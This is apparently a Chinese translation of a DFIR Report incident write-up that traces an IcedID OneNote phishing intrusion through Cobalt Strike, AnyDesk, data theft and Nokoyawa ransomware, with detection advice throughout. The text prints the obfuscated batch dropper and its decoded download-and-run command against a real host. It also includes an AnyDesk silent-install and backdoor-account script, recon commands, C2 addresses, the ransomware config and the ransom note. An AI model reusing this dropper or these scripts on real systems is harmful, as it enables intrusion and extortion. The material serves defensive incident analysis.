【DFIR报告翻译】OneNote? RansomNote!

之后攻击者通过Cobalt Strike和AnyDesk访问了文件服务器和备份服务器。

最终攻击者在部署Nokoyawa 勒索软件前，通过FileZilla把窃取到的文件进行压缩并通过网络外传。

我们分析这次入侵来自一个针对了许多不相关行业的公司的广泛恶意电子邮件钓鱼活动，攻击团伙大量使用了通用诱饵，附带了一个声称包含模糊地“安全消息”的OneNote文件。这一活动已经记录在pr0xylife的GitHub 仓库的开源威胁情报中。攻击者的活动ID是3329953471，这组数字嵌入在IcedID DLL负载的配置数据中。

根据Proofpoint威胁研究，与其他活动相比，该活动的邮件数量并不是很大，在两天内观察到的邮件数量不到一千封，广泛地针对制造业、技术、能源、零售、保险等多个行业的公司。该活动背后的攻击者使用了与两个已跟踪的攻击者类似的技术，但没有提供足够的独特特征来明确将该活动归因于其中任何一个。

在本案例中，钓鱼邮件附带的OneNote文件并不是很复杂。一个名为“O p e n.cmd”的Windows批处理文件隐藏在一个名为“Open”的大按钮后面，在OneNote文件中，背景是一个模糊的文件图像，前景是简单的指示，告诉用户双击按钮。

通过OneNote诱饵的初始执行需要收件人打开OneNote文件。在点击警告提示后，O p e n.cmd文件执行了PowerShell以下载一个名为JPG文件的IcedID DLL，然后使用rundll32执行了该DLL，该DLL立即连接到命令和控制服务器，进行检查并开始在未加密的HTTP上进行信标，触发了一个Emerging Threats Open规则：ET MALWARE Win32/IcedID Request Cookie。

最初Sysmon可以检测到一些OneNote的可疑行为，通过Event ID 11文件创建日志和Event ID 15 文件流创建日志可以看到OneNote创建 .cmd 文件的行为。

在VirusTotal上可以搜索到O p e n.cmd文件。这个批处理脚本使用了简单的混淆手法，但依然有特征可以检测。文件内容如下

echo off
:qwgfpcrunmj
set hbkges=f
:lkrcopjabty
set lozqhj=u
:swgkeilncqt
set yfkbvh=t
:oxfdbryeugm
set pstmyd=d
:lhwidcjzeng
set vuozfr=r
:sohaywibtlv
set kcqmjh=n
:resxaqghcpt
set lwdyaf=x
:yzdnbfiqklx
set kurwgp=c
:jowrmvshtpk
set lnkumy=h
:yzcjremsxug
set awhqpx=j
:tinwcfeqmds
set jzblsd=l
:vkulryjfzmn
set qyohmf=k
:iaovhbwplkf
set stbail=p
:dtrigeswozj
set pnmksz=o
:qycxahgkfde
set tdnbph=w
:ulsjinzqbxa
set xjzoqw=g
:mtevlfsngyp
set fcuhvg=a
:jkwzvmciray
set lfdopz=z
:hegsubldtxc
set eaycnb=b
:akqwyismeoj
set xmtuiw=i
:zxgqcblivnu
set vrqjpn=q
:ajfkhpcqiwo
set oaficv=m
:mlaykspvqhj
set uqpwtj=s
:rietmyubfwz
set bzovaq=e
:ldhapnitrow
set hlfnpe=v
:xyfdvlbmpze
set wmjqdx=y
:tgoqkcdlbxp
%stbail%%pnmksz%%tdnbph%%bzovaq%%vuozfr%%uqpwtj%%lnkumy%%bzovaq%%jzblsd%%jzblsd% %xmtuiw%%kcqmjh%%hlfnpe%%pnmksz%%qyohmf%%bzovaq%-%tdnbph%%bzovaq%%eaycnb%%vuozfr%%bzovaq%%vrqjpn%%lozqhj%%bzovaq%%uqpwtj%%yfkbvh% -%lozqhj%%vuozfr%%xmtuiw% %lnkumy%%yfkbvh%%yfkbvh%%stbail%://%oaficv%%vuozfr%%fcuhvg%%uqpwtj%%uqpwtj%%pnmksz%%kurwgp%%xmtuiw%%fcuhvg%%yfkbvh%%yfkbvh%%bzovaq%%uqpwtj%.%kurwgp%%pnmksz%%oaficv%/%xmtuiw%%oaficv%%fcuhvg%%xjzoqw%%bzovaq%%uqpwtj%/62.%xjzoqw%%xmtuiw%%hbkges% -%pnmksz%%lozqhj%%yfkbvh%%hbkges%%xmtuiw%%jzblsd%%bzovaq% %kurwgp%:%stbail%%vuozfr%%pnmksz%%xjzoqw%%vuozfr%%fcuhvg%%oaficv%%pstmyd%%fcuhvg%%yfkbvh%%fcuhvg%COI%oaficv%.%awhqpx%%stbail%%xjzoqw%
%vuozfr%%lozqhj%%kcqmjh%%pstmyd%%jzblsd%%jzblsd%32 %kurwgp%:%stbail%%vuozfr%%pnmksz%%xjzoqw%%vuozfr%%fcuhvg%%oaficv%%pstmyd%%fcuhvg%%yfkbvh%%fcuhvg%COI%oaficv%.%awhqpx%%stbail%%xjzoqw%,%xmtuiw%%kcqmjh%%xmtuiw%%yfkbvh%
%bzovaq%%lwdyaf%%xmtuiw%%yfkbvh%

对脚本内容进行反混淆后（或者追踪子进程的命令行）可以得到最终要执行的内容如下：

powershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:programdata、COIm.jpg

上面的命令执行后，会从URL下载一个GIF图片到C:programdata，而落地后的文件实际上是一个DLL文件。

然后使用rundll32运行这个DLL

rundll32 c:programdataCOIm.jpg,init

在获取失陷主机的权限过了快一个月的时候，攻击者开始通过AnyDesk连接到失陷主机。让我们不解的是，攻击者又双击执行了一遍OneNote钓鱼文件。这样IcedID恶意软件又运行了一次。虽然不确定他们这样做的意图是什么，但这样的异常行为给了我们通过入侵检测发现攻击的机会。

CobaltStrike载荷的执行

在入侵的第33天，IceID恶意软件开始下载释放一些文件。

这些文件是Cobalt Strike载荷。IceID从用户的临时目录下通过调用regsvr32运行DLL形式的载荷。同时，IceID也运行了EXE形式的载荷，名为Funa2.exe。

在横向移动期间，攻击者同样使用了exe形式的载荷程序。他们通过RDP访问目标机器，然后使用IE浏览器下载载荷文件，直接双击执行。

入侵期间，CS载荷使用了以下几个命名管道

我们可以利用Sysmon检测使用默认特征的Cobalt Strike载荷运行特征。

DLL形式运行的CS载荷没有使用命名管道的行为。

Cobalt Strike默认的命名管道格式如下：

postex_*
postex_ssh_*
status_*
msagent_*
MSSE-*
*-server

更多关于Cobalt  Strike的特征检测，可阅读：Cobalt Strike, a Defender’s Guide part 1和part 2

IceID分两个阶段来执行，执行后会创建一个计划任务，周期性地运行IceID，这是IceID恶意软件常用的权限维持手法。

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <URI>azigci_{C747FFDF-F0E2-113B-8DCA-0ECA4EBB92A2}</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger id="LogonTrigger">
      <Enabled>true</Enabled>
      <UserId>[REDACTED]</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
      <UserId>[REDACTED]</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>rundll32.exe</Command>
      <Arguments>"C:Users[REDACTED]AppDataRoaming[REDACTED]Cadiak.dll",init --od="DeskBlouselicense.dat"</Arguments>
    </Exec>
  </Actions>
</Task>

入侵过程中，攻击者通过命令行安装AnyDesk时，会创建一个自启动系统服务

C:ProgramDataAnyDesk.exe --install C:ProgramDataAny --start-with-win --silent

服务创建行为i会记录在系统日志中：

每次创建系统服务时都进行告警，会产生大量的误报，对日常安全分析造成严重的噪音影响。有很多基于路径特征的检测方式可以很好地避免这种情况，可参考链接，针对RMM创建服务的行为进行检测。并且安全团队需要不断根据企业情况对检测规则进行优化。

在本次入侵中，被钓鱼的用户是域管理员组的成员之一，因此获取到最初的失陷主机权限时，攻击者就已经拿到了域管权限。从业界最佳实践来说，我们建议拥有高权限的管理员用户在必要工作时，优先使用低权限的用户浏览网页、电子邮件或文件。

伪装

IcedID 试图通过将恶意软件 DLL 文件命名为 COIm.jpg 来规避检测。将 DLL 文件扩展名更改为通常被忽视的图像文件类型，比如 jpg、gif 或 png，是一种伪装技巧，对应 MITRE 技术 T1036.008，并且为创建检测规则提供了一个极好的机会。

攻击者在入侵过程中使用的其他工具中，被发现使用了常见的 Windows 进程名称，包括：

• 将从地址 91.215.85[.]183/download/csrss.exe 下载的 Cobalt Strike 信标命名为 csrss.exe。

• 将部署到系统上的勒索软件有效载荷命名为 svchost.exe。

进程注入

Cobalt Strike 载荷运行时，有对 svchost.exe 进程进行进程注入的行为。在这种情况下，进程注入是通过向远程进程写入代码，并通过一个远程线程执行该代码来完成的。

随后，svchost.exe 执行了多个与发现和枚举相关的不同命令。这些命令包括列出网络中的设备、搜集系统信息、查找开放的端口、识别服务和应用程序等，这些行为通常是为了攻击者进一步的入侵和横向移动做准备。

由于发现命令涉及通过 cmd.exe 执行脚本，因此从系统内存转储中观察到了 svchost.exe 和 cmd.exe 之间不寻常的父子进程关系。这种异常关系可能表明攻击者正在利用合法的系统进程（如 svchost.exe）来掩盖其恶意行为，通过它们来启动 cmd.exe 并执行进一步的攻击命令，从而避免直接使用可疑或未知的进程，减少被安全软件检测到的风险。

痕迹清理

攻击者为了数据窃取活动而安装的 FileZilla，在最后的勒索软件部署阶段被攻击者手动卸载。这一行为可能是为了消除痕迹，避免在后续的调查中被发现，从而增加攻击的隐蔽性。通过卸载这样一个用于数据传输的工具，攻击者试图清除可能留下的任何日志文件或证据，使得追踪和分析攻击行为变得更加困难。

在入侵过程中，攻击者从 LSASS 中提取了凭据。该过程始于 Cobalt Strike 信标进程启动了一个新的 rundll32.exe 子进程，该子进程以 SYSTEM 身份运行，且没有命令行参数。通常情况下，rundll32 执行时不带有命令行参数是不常见的，但这却是 Cobalt Strike 信标注入目标进程的一个常见模式。这构成了一个有用的检测模式。rundll32 进程还创建了一个命名管道（Sysmon 事件 ID 17），管道名称以“postex_”开头，这是另一个众所周知的 Cobalt Strike 信标工件，可以被检测到。新生成的 rundll32 进程访问了 lsass.exe 进程，然后在 lsass.exe 中创建了一个远程线程。这些事件被 Sysmon 事件 ID 8 和 10 记录下来。

Sysmon Event ID 10 包含了以下相关的字段，这些字段对于威胁狩猎或事件响应可能非常有用：

Process accessed:
SourceImage: C:Windowssystem32rundll32.exe
TargetImage: C:Windowssystem32lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:WindowsSYSTEM32ntdll.dll+9d1e4|C:WindowsSystem32KERNELBASE.dll+2bcbe|UNKNOWN(0000017C0BD11D3D)
TargetUser: NT AUTHORITYSYSTEM

Sysmon Event ID 8包含以下字段：

CreateRemoteThread detected:
SourceImage: C:WindowsSystem32rundll32.exe
TargetImage: C:WindowsSystem32lsass.exe
StartModule: -
StartFunction: -
TargetUser: NT AUTHORITYSYSTEM

在访问并注入 LSASS 之后，攻击者开始使用另一个域管理员账户，这表明他们已经成功获取了凭据访问权限。在攻击者进行文件共享浏览活动期间，我们观察到他们找到了一份与环境密码相关的文档并将其打开。

IcedID 探测

IcedID 在最初的失陷主机上被观察到通过 rundll32.exe 执行了多个发现命令。

WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get * /Format:List
ipconfig /all
systeminfo
net config workstation
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /all /domain
net view /all
net group "Domain Admins" /domain

这些主机分析命令按照这个顺序通常是从 IcedID 僵尸网络中看到的，并且通过对 IcedID 二进制文件进行逆向工程分析表明，它们是硬编码的（在加密字符串中），当僵尸网络接收到来自其命令和控制服务器的特定命令时就会被执行。Binary Defense发布的一份 IcedID 分析报告描述了观察到的相同命令，而Walmart的一份报告详细说明了解密命令字符串的算法。在不同的 IcedID 样本中，这些命令可能会出现不同的顺序，但所有版本都包含几乎相同的分析命令列表。

虽然单独对任何一个命令进行警报可能会导致安全操作中出现太多误报，但一个有用的技术是在同一个主机上短时间内看到三个或四个这样的命令时设置警报。如果父进程是 rundll32、regsvr32 或另一个高风险进程，警报的严重性可能会提高。

AD信息枚举

攻击者利用一个被进程注入的svchost.exe 进程在最初的失陷主机上下载了一个 AD.bat 批处理脚本和 AdFind.exe。

AD.bat 脚本随后被执行，该脚本通过调用 ADFind 对 Active Directory 敏感信息进行枚举。

adfind.exe  -gcb -sc trustdmp 
adfind.exe  -f "(objectcategory=group)" 
adfind.exe  -subnets -f (objectCategory=subnet)
adfind.exe  -f (objectcategory=organizationalUnit) 
adfind.exe  -f objectcategory=computer -csv name operatingSystem 
adfind.exe  -f objectcategory=computer 
adfind.exe  -f (objectcategory=person) 
C:Windowssystem32cmd.exe /c dir /s /b C:Windowssystem32*htable.xsl

Nslookup 内网探测

被进程注入的 svchost.exe 还下载了一个ns.bat批处理文件。

执行 ns.bat 启动了 nslookup 命令的执行，这些命令尝试解析多个桌面和服务器的主机名。

随后，观察到第二个名为 nsser.bat 的脚本执行了多个 nslookup 命令。

端口扫描

攻击者在多个不同的目录下的不同系统上使用了 SoftPerfect Network Scanner。

NetScan 连接到多个不同的 IP 地址上的多个端口，这种活动表明正在进行端口扫描。

以下是使用 NetScan 扫描的端口列表摘要。

手动地内网探测

在 RDP 会话期间，攻击者还被发现通过开始菜单多次打开任务管理器，这一点由 /7 标志证明。

攻击者手动执行的其他命令也被发现，这些命令要么是通过 Cobalt Strike 信标执行的，要么是通过在交互式的 AnyDesk 或 RDP 会话中打开的 Windows 命令提示符执行的。命令包括：

C:Windowssystem32cmd.exe /C net group "domain Admins" /domain
route print
whoami

RDP 被攻击者用来从最初的失陷主机向环境中的其他服务器进行横向移动。在通过 RDP 连接到每个服务器后，攻击者采取措施部署 Cobalt Strike 信标，以及在系统上安装 AnyDesk。

Cobalt Strike 有效载荷是通过 Internet Explorer 从 91.215.85[.]183/download/csrss.exe 下载的。

然后，该有效载荷多次从下载文件夹启动，同时也被复制并从 Windows 临时文件夹执行。

此外，INSTALL.ps1 脚本被 Cobalt Strike 信标投放并执行。

虽然攻击者在该环境中花费了相当长的时间，但他们似乎对某些文件表现出了特别的兴趣。一个具体的例子是，在攻击者使用 AnyDesk 访问文件服务器后，他们使用 Notepad++ 打开了一个与此受害者的保险政策相关的文件。

在最初的失陷主机上，工作站的文件使用了它们各自的“首选”选项打开：对于 .docx 文件使用 Word，对于 .xlsx 文件使用 Excel，而对于 .pdf 文件则使用 Internet Explorer。

虽然并不总能轻易获得攻击者具体访问过的文件的完整列表，但这一次在进程活动中记录得相当完整。

在其他机器上，攻击者对某些文件表现出明显的关注，主要是与可能的密码、个人身份信息（PII）和其他财务数据相关的文件。

攻击者使用了三种不同的方式来访问这个网络中的主机：

- IcedID

- Cobalt Strike

- AnyDesk

以下是在入侵期间发现的每个阶段的概述。

IcedID

IcedID 使用多个阶段性域名来传递其功能的不同部分。在 rundll32 进程中运行的 IcedID DLL 立即通过端口 80 连接到其命令和控制服务器，使用的域名为 aerilaponawki[.]com，当时解析为 IP 地址 193.149.129.131。这个网络连接的内容与免费新兴威胁开放规则集 ET MALWARE Win32/IcedID 请求 Cookie 的恶意软件规则相匹配。

IcedID 进程还通过域名连接到另外两个命令和控制服务器，但这两个连接都使用了 TLS 加密并通过端口 443，因此网络传感器无法观察到太多内容或匹配到太多网络检测规则，如果有 TLS 终止或未加密流量会更容易观察。到端口 443 上的 klindriverfor[.]com (5.255.102.167) 的连接大约每 10 分钟重复一次，持续了 12 天。到端口 443 上的 alishaskainz[.]com (45.61.139.206) 的连接也大约每 10 分钟重复一次，持续了 28 天。

下面的表格展示了每个域名的概述和功能：

对于每个域名，以下是可以（组合）使用的相关内容规则概述，用于查找 IcedID 行为的特征：

aerilaponawki[.]com:

- ET MALWARE Win32/IcedID 请求 Cookie：这个规则专门设计来检测与 IcedID 相关的恶意软件请求 Cookie 的网络活动，这是一种典型的 IcedID 行为。

klindriverfor[.]com:

- ET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)：这个规则旨在检测使用 OpenSSL Demo CA 证书的网络通信。由于这种证书通常不用于合法的商业目的，因此可能表明存在恶意活动。

alishaskainz[.]com:

- ET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)：与 klindriverfor[.]com 类似，这个规则也是为了检测使用 OpenSSL Demo CA 证书的通信，这可能表明有恶意软件在使用这些证书进行通信。

halicopnow[.]com:

- ET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)：这个规则同样是为了检测使用 OpenSSL Demo CA 证书的网络活动，这可能是 IcedID 或其他恶意软件在使用这些证书进行通信的迹象。

通过结合这些规则，安全团队可以更有效地监控和检测网络中的 IcedID 相关活动。这些规则可以帮助识别与 IcedID 相关的特定行为模式，从而提高对潜在威胁的响应速度和准确性。

Cobalt Strike

在入侵期间使用的 Cobalt Strike 信标被命名为：

- agaloz.dll

- Funa2.exe / csrss.exe

它们包含配置信息，用于联系下面的命令和控制服务器：

Suricata 报告了 Cobalt Strike 信标使用的“可塑性”（Malleable）配置文件的命中情况。这些配置文件是可预配置的，主要用于“模仿”不同应用程序的已知流量，例如邮件客户端、聊天客户端或 JavaScript 库。命中的规则可以在下面的第一张截图中看到。

第二张截图显示了配置文件的实际配置部分，其外观与这个“gmail”配置文件非常相似。通信通过 URI 进行：/_/scs/mail-static/_js/。这种方式使得 Cobalt Strike 信标能够伪装成正常的、看似合法的网络流量，从而更难被安全设备检测到。通过模仿 Gmail 的网络行为，攻击者可以隐蔽地传输命令和控制信息，而不引起注意。

DFIR Report威胁情报团队在 2023 年 1 月 9 日，也就是入侵发生前几周，就发现了这个 Cobalt Strike 服务器。在那一天，信标配置文件类似于一个公开可用的可塑性 C2 配置文件，该配置文件模仿了 jquery。

命令和控制服务器似乎至少一直使用到 2024 年 4 月，因为有一个不同的 Cobalt Strike 信标通过与本次入侵观察到的类似的 Gmail 风格配置文件和远程 IP 报告给了 Triage 恶意软件沙箱服务。这表明攻击者可能在一段时间内持续使用该服务器进行恶意活动。

也就是说，看起来微软在 2023 年 4 月 6 日接管了这个域名，当时 DNS 从 Cloudflare 切换到了 MICROSOFTINTERNETSAFETY.NET，域名开始解析到 20.69.178.82（微软的 IP 地址）。这表明微软可能已经意识到了该域名的恶意使用，并采取措施接管了它，以防止进一步的滥用。

我们可以看到这个注册信息也已经被更新了（显示最后更新的日期）：

我们还能够找到微软、Fortra 和 Health-ISAC 提交的关于获取这个域名的投诉：

以下是从投诉中提取的域名和注册信息。

根据 The DFIR Report 的威胁情报团队，该 IP 被观察到至少在 2023 年 6 月 3 日之前托管 Cobalt Strike。

在初始部署之后，攻击者下载了额外的信标，所有这些信标的父进程都是名为 Funa2.exe 的可执行文件。看起来 .dll 文件可能没有按预期工作，因为五分钟后，一个同名的 .exe 文件被下载了。

DLL 下载尝试：

变更为 EXE 下载：

紧接着，我们发现第一次使用可塑性配置文件路径连接到服务器的情况：

AnyDesk

在入侵的后期阶段，攻击者使用一个复制到 C:ProgramDataINSTALL.ps1 的 PowerShell 脚本部署了 AnyDesk。此外，复制的 PowerShell 脚本在多个系统上执行，以便于使用以下命令部署 AnyDesk：

mkdir "C:ProgramDataAny"
# Download AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:ProgramDataAnyDesk.exe"
$clnt.DownloadFile($url,$file)


cmd.exe /c C:ProgramDataAnyDesk.exe --install C:ProgramDataAny --start-with-win --silent


cmd.exe /c echo btc1000qwe123 | C:ProgramDataAnyAnyDesk.exe --set-password


#net user AD "2020" /add
#net localgroup Administrators InnLine /ADD
#reg add "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserlist" /v InnLine /t REG_DWORD /d 0 /f

这个安装脚本似乎与之前泄露的Conti使用的PowerShell脚本类似：

AnyDesk 既可以作为已安装的服务（如上文所述），也可以使用便携版本。官方 AnyDesk 网站详细说明了两者之间的区别和限制。由于我们这里讨论的是“已安装”的版本，它将在系统上留下与已安装版本相关的特定痕迹。有多位专家撰写了关于 AnyDesk 痕迹的文章，例如 Inversecos 或 TylerBrozek，这些文章在与 AnyDesk 痕迹相关的取证过程中提供了极大的帮助。

对于 ad_svc.trace，我们可以找到像这样的条目：

info REDACTED       gsvc   6600  11452   26                anynet.any_socket - Client-ID: 485343132 (FPR: 9805919074ee).
info REDACTED       gsvc   6600  11452   46                anynet.any_socket - Logged in from 152.89.196.49:61384 on relay a541c14e
info REDACTED       gsvc  10136   2256 2515                anynet.any_socket - Client-ID: 547283332 (FPR: 17e2ee445059).
info REDACTED       gsvc  10136   2256 2515                anynet.any_socket - :54241 on relay ffe9a90c.

三十四天之后，也就是在开始手动活动大约 28 小时后，攻击者进行了他们的最终行动，部署了 Nokayawa 勒索软件。Nokayawa 的变种与我们已经报告过的类似。

正如大多数与勒索软件相关的案例一样，在实际部署之前，攻击者四处搜寻，收集与备份功能和系统相关的信息。在这种情况下，攻击者在文件服务器和备份服务器之间移动，查看配置，投放和“调试”勒索软件，最终进行清理。

攻击者首先使用 mmc.exe 通过 gpedit.msc 查看本地组策略。大约 20 分钟后，攻击者开始在文件服务器上执行勒索软件脚本。

在这种情况下，勒索软件文件，包括 svchost.exe 和一个名为 [REDACTED]1.bat 的“自动化”文件，是通过 AnyDesk 会话作为父进程传递的。

批处理脚本，[REDACTED].1.bat，使用 --config 参数启动了可执行文件 svchost.exe，其中包含了一个 Base64 编码的字符串：

{
EXTENSION: "NOKONOKO",
NOTE_NAME: "NOKONOKO-readme.txt",
NOTE_CONTENT: "<BASE64 ENCODED NOTEBLOB>",
ECC_PUBLIC: "AHpyfaG1ftdE4NNQ0laC2825GOpTwUw5Y9+WEMkAAAC0Yd7VSOy7D5CxWhHH4pzSYdCXjpPXqEZ2X2r6kgEAAA==",
SKIP_DIRS: [
"windows",
"program files",
"program files (x86)",
"appdata",
"programdata",
"system volume information"
],
SKIP_EXTS: [
".exe",
".dll",
".ini",
".lnk",
".url"
],
ENCRYPT_NETWORK: true,
LOAD_HIDDEN_DRIVES: true,
DELETE_SHADOW: true
}

在文件服务器上执行操作后，攻击者转移到了备份服务器，在那里他们再次表现出对组策略的兴趣。在备份服务器上，他们也查看了服务器配置。似乎存在一些问题，因为有一些“文件锁定”措施，很可能会阻止访问。攻击者试图通过使用一个名为 IOBit 的工具来绕过这些“锁定”。这个工具能够移除文件锁定。

在此之后，勒索软件的部署方式与在文件服务器上相同。然而，在部署过程中似乎出现了问题。攻击者启动了 ProcessHacker 并使用 notepad++，可能是为了修复与勒索软件执行相关的某些问题。这是基于这样一个事实，即攻击者在备份服务器上执行了勒索软件二进制文件 11 次，之后返回并在文件服务器上第二次执行了勒索软件。

在加密了备份服务器后，攻击者通过添加/删除程序卸载了备份软件。

此外，在文件服务器上最终执行后，记事本被用来查看已部署的勒索通知。上述基础64配置中的 NOTE_CONTENT 似乎又被基础64编码了，解码后得到的勒索通知如下：

Nokoyawa.

If you see this, your files have been successfully encrypted and stolen.
Don't try to search free decryption method.
It's impossible. 
We are using symmetrical and asymmetric encryption.

ATTENTION:
- Don't rename encrypted files.
- Don't change encrypted files.
- Don't use third party software.

You are risking irreversibly damaging the file by doing this.
If you manage to keep things quiet on your end, this will never be known to the public.
To reach an agreement you have 48 hours to visit our Onion Website.

How to open Onion links:
- Download TOR Browser from official website.
- Open and enter this link:
http://nokopay<REDACTED>
- On the page you will see a chat with the Support.
- Send your first message.

Don't waste your time.
Otherwise all your valuable and sensitive data will be leaked.
Our websites are full of companies that doubted the fact of the data breach or it's extent.
- http://nokoleakb76znymx443veg4n6fytx6spck6pc7nkr4dvfuygpub6jsid.onion/
- http://hl66646wtlp2naoqnhattngigjp5palgqmbwixepcjyq5i534acgqyad.onion/
- http://snatchteam.top

攻击者只在这两台服务器上部署了勒索软件，并没有进行整个域的部署。在对这两个系统进行勒索之后，攻击者的活动就停止了。